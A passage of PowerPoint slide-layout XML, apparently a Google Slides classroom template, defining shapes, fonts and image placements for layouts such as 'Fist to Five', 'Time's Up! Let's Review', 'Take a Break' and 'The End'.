        <p:nvPicPr>
          <p:cNvPr id="996" name="Google Shape;996;p58"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3877056"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="997" name="Google Shape;997;p58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="4314663"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>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46. Bullets 1–8 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1_1_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 998"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="999" name="Google Shape;999;p59"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="0"/>
            <a:ext cx="9168600" cy="533700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="182875" rIns="274300" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>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0" name="Google Shape;1000;p59"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="9144000" cy="364800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="91425" rIns="457200" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1800">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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1001" name="Google Shape;1001;p59"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274375" y="640080"/>
            <a:ext cx="8595600" cy="10200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1002" name="Google Shape;1002;p59"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1003" name="Google Shape;1003;p59"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274320" y="4906455"/>
            <a:ext cx="8595600" cy="10200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="A9B7C0"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1004" name="Google Shape;1004;p59"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>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5" name="Google Shape;1005;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1003925" y="3873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59"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-24600" y="38730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7" name="Google Shape;1007;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1003800" y="43111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59"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="43112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09" name="Google Shape;1009;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1003875" y="299662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59"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-150" y="299675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1" name="Google Shape;1011;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1003750" y="34347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59"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="343487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3" name="Google Shape;1013;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1003900" y="213525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59"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-24725" y="2135375"/>
            <a:ext cx="9144000" cy="3657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5" name="Google Shape;1015;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1003775" y="25733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59"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="25735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7" name="Google Shape;1017;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1003775" y="1258875"/>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59"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1259000"/>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19" name="Google Shape;1019;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1003775" y="1697000"/>
            <a:ext cx="7866300" cy="3771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59"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1697125"/>
            <a:ext cx="9144000" cy="377100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1243575" tIns="0" rIns="457200" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>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21" name="Google Shape;1021;p59"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1261872"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1022" name="Google Shape;1022;p59"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1709928"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1023" name="Google Shape;1023;p59"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2129247"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1024" name="Google Shape;1024;p59"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2577303"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1025" name="Google Shape;1025;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2999232"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1026" name="Google Shape;1026;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3438144"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1027" name="Google Shape;1027;p59"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3877056"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1028" name="Google Shape;1028;p59"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="4314663"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:extLst>
    <p:ext uri="{DCECCB84-F9BA-43D5-87BE-67443E8EF086}">
      <p15:sldGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main">
        <p15:guide id="1" pos="288">
          <p15:clr>
            <a:srgbClr val="F9AD4C"/>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47. Fist to Five">
  <p:cSld name="CUSTOM_2_3_1_1_3_1_1_2_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1029"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1030" name="Google Shape;1030;p60"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="59" b="59"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="274320" y="274881"/>
            <a:ext cx="8595360" cy="4593743"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1031" name="Google Shape;1031;p60"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274350" y="3307075"/>
            <a:ext cx="8595300" cy="1561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None/>
              <a:defRPr sz="3000">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Ligh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32" name="Google Shape;1032;p60"/>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33" name="Google Shape;1033;p60"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1034" name="Google Shape;1034;p60"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="827549" y="769725"/>
            <a:ext cx="7488902" cy="1856625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1035" name="Google Shape;1035;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="202525" y="2754341"/>
            <a:ext cx="8595300" cy="371100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="91425" rIns="0" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>FIST TO FIVE:</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1036" name="Google Shape;1036;p60"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2305500" y="3307075"/>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48. Review">
  <p:cSld name="CUSTOM_17_2_1_2_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1037"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1038" name="Google Shape;1038;p61"/>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39" name="Google Shape;1039;p61"/>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40" name="Google Shape;1040;p61"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="4916650"/>
            <a:ext cx="7971900" cy="226800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="274300" tIns="45700" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="7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1041" name="Google Shape;1041;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274350" y="2880775"/>
            <a:ext cx="85953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3600">
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Time’s Up! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3600">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Let’s Review.</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1042" name="Google Shape;1042;p61"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3960959" y="1143000"/>
            <a:ext cx="1222082" cy="16386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49. Take a Break 1">
  <p:cSld name="CUSTOM">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1043"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1044" name="Google Shape;1044;p62"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1045" name="Google Shape;1045;p62"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-42900" y="-24125"/>
            <a:ext cx="9229800" cy="5191749"/>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50. Take a Break 2">
  <p:cSld name="CUSTOM_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1046"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1047" name="Google Shape;1047;p63"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8556784" y="4749851"/>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
        <p:nvSpPr>
          <p:cNvPr id="1048" name="Google Shape;1048;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143971" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1049" name="Google Shape;1049;p63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-25" y="411400"/>
            <a:ext cx="9144000" cy="792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4800">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Take a Break!</a:t>
            </a:r>
            <a:endParaRPr sz="4800">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1050" name="Google Shape;1050;p63"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2305500" y="1468500"/>
            <a:ext cx="4533000" cy="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57. The End">
  <p:cSld name="CUSTOM_7">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1051"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1052" name="Google Shape;1052;p64"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2489" b="2498"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="274320" y="274881"/>
            <a:ext cx="8595360" cy="4593742"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1053" name="Google Shape;1053;p64"/>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a:t>
            </a:fld>
            <a:endParaRPr sz="600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1054" name="Google Shape;1054;p64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="4916650"/>
            <a:ext cx="7971900" cy="226800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="274300" tIns="45700" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1055" name="Google Shape;1055;p64"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
